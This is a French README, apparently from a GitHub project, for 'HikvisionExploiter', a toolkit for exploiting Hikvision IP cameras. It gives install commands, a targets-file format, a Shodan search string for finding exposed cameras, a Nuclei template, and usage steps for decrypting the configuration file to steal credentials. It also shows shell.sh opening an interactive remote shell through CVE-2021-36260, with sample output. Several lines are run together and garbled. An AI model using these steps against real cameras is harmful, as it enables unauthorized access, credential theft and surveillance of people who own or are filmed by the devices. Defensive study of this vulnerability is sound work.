
HikvisionExploiter est un utilitaire basé sur Python conçu pour automatiser l'exploitation et les vérifications d'accessibilité des répertoires sur les caméras réseau Hikvision exploitant l'interface Web Version 3.1.3.150324 + Détection CVE-2021-36260
HikvisionExploiter est une boîte à outils d'exploitation automatisée et puissante ciblant les endpoints non authentifiés des caméras IP Hikvision, en particulier celles exécutant la version de firmware 3.1.3.150324.
Elle permet :
Conçu pour les chercheurs, les red teamers et les passionnés de sécurité IoT.
/onvif-http/snapshot pour l'exposition de snapshots/System/configurationFile chiffré, le déchiffre avec AES + XOR et extrait les identifiants/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (optionnel, pour une future fonctionnalité de conversion snapshot en vidéo)pycrypto (pour le déchiffrement de la configuration) :
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Créez un fichier targets.txt avec le format suivant :
IP:PORT
Exemple :
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Cela va :
logs/IP_PORT_TIMESTAMP/Pour exécuter des commandes en mode interactif sur un appareil vulnérable :
chmod +x shell.sh
./shell.sh <ip:port>
Exemple :
./shell.sh 192.168.1.10:80
Si l'appareil est vulnérable, vous accéderez à un shell interactif :
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Utilisez la dork Shodan suivante pour localiser les caméras Hikvision exposées :
3.1.3.150324
Un modèle compatible avec Nuclei est inclus : nuclei-template.yaml
Utilisation :
nuclei -t nuclei-template.yaml -list targets.txt
Détecte :
Licence MIT ©
Voir LICENSE pour plus de détails.
Telegram : @HexBuddy127001
Construit avec ❤️ pour la recherche éducative et éthique uniquement.